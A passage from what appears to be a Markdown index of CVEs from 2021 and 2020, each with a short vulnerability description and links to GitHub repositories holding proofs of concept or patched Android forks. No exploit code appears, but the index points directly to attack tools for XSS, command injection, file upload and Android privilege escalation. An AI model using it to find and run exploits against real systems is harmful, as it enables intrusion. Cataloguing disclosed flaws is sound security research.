- [plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Service-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46072](https://github.com/plsanu/CVE-2021-46072)
### CVE-2021-46073 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the User List Section in login panel.
- [plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46073](https://github.com/plsanu/CVE-2021-46073)
### CVE-2021-46074 (2022-01-06)
A Stored Cross Site Scripting (XSS) vulnerability exists in Sourcecodester Vehicle Service Management System 1.0 via the Settings Section in login panel.
- [plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Settings-Stored-Cross-Site-Scripting-XSS)
- [plsanu/CVE-2021-46074](https://github.com/plsanu/CVE-2021-46074)
### CVE-2021-46075 (2022-01-06)
A Privilege Escalation vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. Staff account users can access the admin resources and perform CRUD Operations.
- [plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Privilege-Escalation-Leads-to-CRUD-Operations)
- [plsanu/CVE-2021-46075](https://github.com/plsanu/CVE-2021-46075)
### CVE-2021-46076 (2022-01-06)
Sourcecodester Vehicle Service Management System 1.0 is vulnerable to File upload. An attacker can upload a malicious php file in multiple endpoints it leading to Code Execution.
- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Code-Execution)
- [plsanu/CVE-2021-46076](https://github.com/plsanu/CVE-2021-46076)
### CVE-2021-46078 (2022-01-06)
An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to a Stored Cross-Site Scripting vulnerability.
- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting)
- [plsanu/CVE-2021-46078](https://github.com/plsanu/CVE-2021-46078)
### CVE-2021-46079 (2022-01-06)
An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.
- [plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection)
- [plsanu/CVE-2021-46079](https://github.com/plsanu/CVE-2021-46079)
### CVE-2021-46080 (2022-01-06)
A Cross Site Request Forgery (CSRF) vulnerability exists in Vehicle Service Management System 1.0. An successful CSRF attacks leads to Stored Cross Site Scripting Vulnerability.
- [plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS](https://github.com/plsanu/Vehicle-Service-Management-System-Multiple-Cross-Site-Request-Forgery-CSRF-Leads-to-XSS)
- [plsanu/CVE-2021-46080](https://github.com/plsanu/CVE-2021-46080)
### CVE-2021-46108 (2022-02-18)
D-Link DSL-2730E CT-20131125 devices allow XSS via the username parameter to the password page in the maintenance configuration.
- [g-rubert/CVE-2021-46108](https://github.com/g-rubert/CVE-2021-46108)
### CVE-2021-46143 (2022-01-06)
In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.
- [nanopathi/external_expat_AOSP10_r33_CVE-2021-46143](https://github.com/nanopathi/external_expat_AOSP10_r33_CVE-2021-46143)
### CVE-2021-46361 (2022-02-11)
An issue in the Freemark Filter of Magnolia CMS v6.2.11 and below allows attackers to bypass security restrictions and execute arbitrary code via a crafted FreeMarker payload.
- [mbadanoiu/CVE-2021-46361](https://github.com/mbadanoiu/CVE-2021-46361)
### CVE-2021-46362 (2022-02-11)
A Server-Side Template Injection (SSTI) vulnerability in the Registration and Forgotten Password forms of Magnolia v6.2.3 and below allows attackers to execute arbitrary code via a crafted payload entered into the fullname parameter.
- [mbadanoiu/CVE-2021-46362](https://github.com/mbadanoiu/CVE-2021-46362)
### CVE-2021-46363 (2022-02-11)
An issue in the Export function of Magnolia v6.2.3 and below allows attackers to perform Formula Injection attacks via crafted CSV/XLS files. These formulas may result in arbitrary code execution on a victim's computer when opening the exported files with Microsoft Excel.
- [mbadanoiu/CVE-2021-46363](https://github.com/mbadanoiu/CVE-2021-46363)
### CVE-2021-46364 (2022-02-11)
A vulnerability in the Snake YAML parser of Magnolia CMS v6.2.3 and below allows attackers to execute arbitrary code via a crafted YAML file.
- [mbadanoiu/CVE-2021-46364](https://github.com/mbadanoiu/CVE-2021-46364)
### CVE-2021-46365 (2022-02-11)
An issue in the Export function of Magnolia v6.2.3 and below allows attackers to execute XML External Entity attacks via a crafted XLF file.
- [mbadanoiu/CVE-2021-46365](https://github.com/mbadanoiu/CVE-2021-46365)
### CVE-2021-46366 (2022-02-11)
An issue in the Login page of Magnolia CMS v6.2.3 and below allows attackers to exploit both an Open Redirect vulnerability and Cross-Site Request Forgery (CSRF) in order to brute force and exfiltrate users' credentials.
- [mbadanoiu/CVE-2021-46366](https://github.com/mbadanoiu/CVE-2021-46366)
### CVE-2021-46381 (2022-03-04)
Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
- [JCPpeiqi/-cve-2021-46381](https://github.com/JCPpeiqi/-cve-2021-46381)
### CVE-2021-46398 (2022-02-04)
A Cross-Site Request Forgery vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim. An admin can run commands using the FileBrowser and hence it leads to RCE.
- [febinrev/CVE-2021-46398_Chamilo-LMS-RCE](https://github.com/febinrev/CVE-2021-46398_Chamilo-LMS-RCE)
- [LalieA/CVE-2021-46398](https://github.com/LalieA/CVE-2021-46398)
### CVE-2021-46417 (2022-04-07)
Insecure handling of a download function leads to disclosure of internal files due to path traversal with root privileges in Franklin Fueling Systems Colibri Controller Module 1.8.19.8580.
- [Henry4E36/CVE-2021-46417](https://github.com/Henry4E36/CVE-2021-46417)
### CVE-2021-46422 (2022-04-27)
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
- [nobodyatall648/CVE-2021-46422](https://github.com/nobodyatall648/CVE-2021-46422)
- [Chocapikk/CVE-2021-46422](https://github.com/Chocapikk/CVE-2021-46422)
- [twoning/CVE-2021-46422_PoC](https://github.com/twoning/CVE-2021-46422_PoC)
- [Awei507/CVE-RCE](https://github.com/Awei507/CVE-RCE)
- [yigexioabai/CVE-2021-46422_RCE](https://github.com/yigexioabai/CVE-2021-46422_RCE)
- [ZAxyr/CVE-2021-46422](https://github.com/ZAxyr/CVE-2021-46422)
- [xanszZZ/SDT_CW3B1_rce](https://github.com/xanszZZ/SDT_CW3B1_rce)
- [latings/CVE-2021-46422](https://github.com/latings/CVE-2021-46422)
- [CJ-0107/cve-2021-46422](https://github.com/CJ-0107/cve-2021-46422)
- [kelemaoya/CVE-2021-46422](https://github.com/kelemaoya/CVE-2021-46422)
- [yyqxi/CVE-2021-46422](https://github.com/yyqxi/CVE-2021-46422)
- [polerstar/CVE-2021-46422-poc](https://github.com/polerstar/CVE-2021-46422-poc)
- [kailing0220/CVE-2021-46422](https://github.com/kailing0220/CVE-2021-46422)
- [tucommenceapousser/CVE-2021-46422](https://github.com/tucommenceapousser/CVE-2021-46422)
### CVE-2021-46702 (2022-02-26)
Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory.
- [Exmak-s/CVE-2021-46702](https://github.com/Exmak-s/CVE-2021-46702)
### CVE-2021-46703 (2022-03-06)
In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer
- [BenEdridge/CVE-2021-46703](https://github.com/BenEdridge/CVE-2021-46703)
### CVE-2021-46704 (2022-03-06)
In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.
- [MithatGuner/CVE-2021-46704-POC](https://github.com/MithatGuner/CVE-2021-46704-POC)
- [Erenlancaster/CVE-2021-46704](https://github.com/Erenlancaster/CVE-2021-46704)
### CVE-2021-56789
- [DataSurgeon-ds/ds-cve-plugin](https://github.com/DataSurgeon-ds/ds-cve-plugin)
### CVE-2021-268855
- [sikkertech/CVE-2021-268855](https://github.com/sikkertech/CVE-2021-268855)
## 2020
### CVE-2020-0001 (2020-01-08)
In getProcessRecordLocked of ActivityManagerService.java isolated apps are not handled correctly. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-8.0, Android-8.1, Android-9, and Android-10 Android ID: A-140055304
- [Zachinio/CVE-2020-0001](https://github.com/Zachinio/CVE-2020-0001)
### CVE-2020-0014 (2020-02-13)
It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-128674520
- [tea9/CVE-2020-0014-Toast](https://github.com/tea9/CVE-2020-0014-Toast)
### CVE-2020-0022 (2020-02-13)
In reassemble_and_dispatch of packet_fragmenter.cc, there is possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-143894715
- [leommxj/cve-2020-0022](https://github.com/leommxj/cve-2020-0022)
- [k3vinlusec/Bluefrag_CVE-2020-0022](https://github.com/k3vinlusec/Bluefrag_CVE-2020-0022)
- [Polo35/CVE-2020-0022](https://github.com/Polo35/CVE-2020-0022)
- [5k1l/cve-2020-0022](https://github.com/5k1l/cve-2020-0022)
- [lsw29475/CVE-2020-0022](https://github.com/lsw29475/CVE-2020-0022)
- [devdanqtuan/poc-for-cve-2020-0022](https://github.com/devdanqtuan/poc-for-cve-2020-0022)
- [themmokhtar/CVE-2020-0022](https://github.com/themmokhtar/CVE-2020-0022)
### CVE-2020-0023 (2020-02-13)
In setPhonebookAccessPermission of AdapterService.java, there is a possible disclosure of user contacts over bluetooth due to a missing permission check. This could lead to local information disclosure if a malicious app enables contacts over a bluetooth connection, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145130871
- [362902755/CVE-2020-0023](https://github.com/362902755/CVE-2020-0023)
### CVE-2020-0041 (2020-03-10)
In binder_transaction of binder.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-145988638References: Upstream kernel
- [bluefrostsecurity/CVE-2020-0041](https://github.com/bluefrostsecurity/CVE-2020-0041)
- [j4nn/CVE-2020-0041](https://github.com/j4nn/CVE-2020-0041)
- [koharin/CVE-2020-0041](https://github.com/koharin/CVE-2020-0041)
- [vaginessa/CVE-2020-0041-Pixel-3a](https://github.com/vaginessa/CVE-2020-0041-Pixel-3a)
- [jcalabres/root-exploit-pixel3](https://github.com/jcalabres/root-exploit-pixel3)
### CVE-2020-0069 (2020-03-10)
In the ioctl handlers of the Mediatek Command Queue driver, there is a possible out of bounds write due to insufficient input sanitization and missing SELinux restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-147882143References: M-ALPS04356754
- [R0rt1z2/AutomatedRoot](https://github.com/R0rt1z2/AutomatedRoot)
- [TheRealJunior/mtk-su-reverse-cve-2020-0069](https://github.com/TheRealJunior/mtk-su-reverse-cve-2020-0069)
- [yanglingxi1993/CVE-2020-0069](https://github.com/yanglingxi1993/CVE-2020-0069)
- [quarkslab/CVE-2020-0069_poc](https://github.com/quarkslab/CVE-2020-0069_poc)
- [0xf15h/mtk_su](https://github.com/0xf15h/mtk_su)
### CVE-2020-0082 (2020-04-17)
In ExternalVibration of ExternalVibration.java, there is a possible activation of an arbitrary intent due to unsafe deserialization. This could lead to local escalation of privilege to system_server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-140417434
- [0x742/CVE-2020-0082-ExternalVibration](https://github.com/0x742/CVE-2020-0082-ExternalVibration)
### CVE-2020-0096 (2020-05-14)
In startActivities of ActivityStartController.java, there is a possible escalation of privilege due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9Android ID: A-145669109
- [wyu0hop/CVE-2020-0096](https://github.com/wyu0hop/CVE-2020-0096)
- [liuyun201990/StrandHogg2](https://github.com/liuyun201990/StrandHogg2)
- [tea9/CVE-2020-0096-StrandHogg2](https://github.com/tea9/CVE-2020-0096-StrandHogg2)
- [nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c](https://github.com/nahid0x1/CVE-2020-0096-strandhogg-exploit-p0c)
### CVE-2020-0108 (2020-08-11)
In postNotification of ServiceRecord.java, there is a possible bypass of foreground process restrictions due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-140108616
- [CrackerCat/ServiceCheater](https://github.com/CrackerCat/ServiceCheater)
### CVE-2020-0113 (2020-06-10)
In sendCaptureResult of Camera3OutputUtils.cpp, there is a possible out of bounds read due to a use after free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-9Android ID: A-150944913
- [XDo0/ServiceCheater](https://github.com/XDo0/ServiceCheater)
### CVE-2020-0114 (2020-06-10)
In onCreateSliceProvider of KeyguardSliceProvider.java, there is a possible confused deputy due to a PendingIntent error. This could lead to local escalation of privilege that allows actions performed as the System UI, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-147606347
- [tea9/CVE-2020-0114-systemui](https://github.com/tea9/CVE-2020-0114-systemui)
### CVE-2020-0121 (2020-06-10)
In updateUidProcState of AppOpsService.java, there is a possible permission bypass due to a logic error. This could lead to local information disclosure of location data with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-148180766
- [mooneee/CVE-2020-0121](https://github.com/mooneee/CVE-2020-0121)
### CVE-2020-0136 (2020-06-11)
In multiple locations of Parcel.cpp, there is a possible out-of-bounds write due to an integer overflow. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-120078455
- [Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136](https://github.com/Satheesh575555/libhwbinder_AOSP10_r33_CVE-2020-0136)
### CVE-2020-0137 (2020-06-11)
In setIPv6AddrGenMode of NetworkManagementService.java, there is a possible bypass of networking permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-141920289
- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0137](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0137)
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2020-0137)
### CVE-2020-0138 (2020-06-11)
In get_element_attr_rsp of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if bluetoothtbd were used, which it isn't in typical Android platforms, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-142878416
- [Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138](https://github.com/Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138)
### CVE-2020-0155 (2020-06-11)
In phNxpNciHal_send_ese_hal_cmd of phNxpNciHal_ext.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-139736386
- [Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155](https://github.com/Trinadh465/hardware_nxp_nfc_AOSP10_r33_CVE-2020-0155)
### CVE-2020-0160 (2020-06-11)
In setSyncSampleParams of SampleTable.cpp, there is possible resource exhaustion due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-124771364
- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0160)
### CVE-2020-0181 (2020-06-11)
In exif_data_load_data_thumbnail of exif-data.c, there is a possible denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145075076
- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0181)
### CVE-2020-0183 (2020-06-11)
In handleMessage of BluetoothManagerService, there is an incomplete reset. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-110181479
- [nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/nanopathi/packages_apps_Bluetooth_AOSP10_r33_CVE-2020-0183)
- [hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183](https://github.com/hshivhare67/platform_packages_apps_bluetooth_AOSP10_r33_CVE-2020-0183)
### CVE-2020-0188 (2020-06-11)
In onCreatePermissionRequest of SettingsSliceProvider.java, there is a possible permissions bypass due to a PendingIntent error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-147355897
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188)
- [ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188](https://github.com/ShaikUsaf/ShaikUsaf-packages_apps_settings_AOSP10_r33_CVE-2020-0188)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0188_CVE-0219)
### CVE-2020-0198 (2020-06-11)
In exif_data_load_data_content of exif-data.c, there is a possible UBSAN abort due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146428941
- [Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198](https://github.com/Trinadh465/external_libexif_AOSP10_r33_CVE-2020-0198)
### CVE-2020-0201 (2020-06-11)
In showSecurityFields of WifiConfigController.java there is a possible credential leak due to a confused deputy. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-143601727
- [uthrasri/Packages_app_settings_CVE-2020-0201](https://github.com/uthrasri/Packages_app_settings_CVE-2020-0201)
- [Trinadh465/packages_apps_Settings_CVE-2020-0201](https://github.com/Trinadh465/packages_apps_Settings_CVE-2020-0201)
### CVE-2020-0203 (2020-06-11)
In freeIsolatedUidLocked of ProcessList.java, there is a possible UID reuse due to improper cleanup. This could lead to local escalation of privilege between constrained processes with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-146313311
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2020-0203)
### CVE-2020-0209 (2020-06-11)
In multiple functions of AccountManager.java, there is a possible permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-145206842
- [pazhanivel07/frameworks_base_CVE-2020-0209](https://github.com/pazhanivel07/frameworks_base_CVE-2020-0209)
### CVE-2020-0215 (2020-06-11)
In onCreate of ConfirmConnectActivity.java, there is a possible leak of Bluetooth information due to a permissions bypass. This could lead to local escalation of privilege that exposes a pairing Bluetooth MAC address with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android Versions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1 Android ID: A-140417248
- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0215)
### CVE-2020-0218 (2020-06-11)
In loadSoundModel and related functions of SoundTriggerHwService.cpp, there is possible out of bounds write due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-136005905
- [pazhanivel07/frameworks_av-CVE-2020-0218](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0218)
### CVE-2020-0219 (2020-06-11)
In onCreate of SliceDeepLinkSpringBoard.java there is a possible insecure Intent. This could lead to local elevation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-122836081
- [pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219](https://github.com/pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219)
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0219)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old)
- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2020-0219_CVE-2020-0188_old-one)
### CVE-2020-0225 (2020-07-17)
In a2dp_vendor_ldac_decoder_decode_packet of a2dp_vendor_ldac_decoder.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-142546668
- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0225](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0225)
### CVE-2020-0226 (2020-07-17)
In createWithSurfaceParent of Client.cpp, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege in the graphics server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150226994
- [Trinadh465/frameworks_native_CVE-2020-0226](https://github.com/Trinadh465/frameworks_native_CVE-2020-0226)
- [ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226](https://github.com/ShaikUsaf/frameworks_native_AOSP10_r33_ShaikUsaf-frameworks_native_AOSP10_r33_CVE-2020-0226)
### CVE-2020-0227 (2020-07-17)
In onCommand of CompanionDeviceManagerService.java, there is a possible permissions bypass due to a missing permission check. This could lead to local escalation of privilege allowing background data usage or launching from the background, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-129476618
- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0227](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0227)
### CVE-2020-0240 (2020-08-11)
In NewFixedDoubleArray of factory.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-150706594
- [ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240](https://github.com/ShaikUsaf/external_v8_AOSP10_r33_CVE-2020-0240)
### CVE-2020-0241 (2020-08-11)
In NuPlayerStreamListener of NuPlayerStreamListener.cpp, there is possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151456667
- [nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241)
### CVE-2020-0242 (2020-08-11)
In reset of NuPlayerDriver.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the media server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-151643722
- [pazhanivel07/frameworks_av-10-r33_CVE-2020-0242](https://github.com/pazhanivel07/frameworks_av-10-r33_CVE-2020-0242)
- [pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243](https://github.com/pazhanivel07/frameworks_av-CVE-2020-0242_CVE-2020-0243)
### CVE-2020-0245 (2020-09-17)
In DecodeFrameCombinedMode of combined_decode.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152496149
- [Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245](https://github.com/Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245)
### CVE-2020-0377 (2020-10-14)
In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158833854
- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377)
### CVE-2020-0380 (2020-09-17)
In allocExcessBits of bitalloc.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-146398979
- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2020-0380)
### CVE-2020-0381 (2020-09-17)
In Parse_wave of eas_mdls.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure in a highly constrained process with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150159669
- [Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381](https://github.com/Trinadh465/external_sonivox_AOSP10_r33_CVE-2020-0381)
### CVE-2020-0391 (2020-09-17)
In applyPolicy of PackageManagerService.java, there is possible arbitrary command execution as System due to an unenforced protected-broadcast. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-158570769
- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0391](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0391)
### CVE-2020-0392 (2020-09-17)
In getLayerDebugInfo of SurfaceFlinger.cpp, there is a possible code execution due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-150226608
- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392)
### CVE-2020-0394 (2020-09-17)
In onCreate of BluetoothPairingDialog.java, there is a possible tapjacking vector due to an insecure default value. This could lead to local escalation of privilege and untrusted devices accessing contact lists with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-155648639
- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0394)
- [pazhanivel07/Settings_10-r33_CVE-2020-0394](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394)
- [pazhanivel07/Settings_10-r33_CVE-2020-0394_02](https://github.com/pazhanivel07/Settings_10-r33_CVE-2020-0394_02)
### CVE-2020-0401 (2020-09-17)
In setInstallerPackageName of PackageManagerService.java, there is a missing permission check. This could lead to local escalation of privilege and granting spurious permissions with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10 Android-11Android ID: A-150857253
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0401)
- [nanopathi/framework_base_AOSP10_r33_CVE-2020-0401](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2020-0401)
### CVE-2020-0409 (2020-11-10)
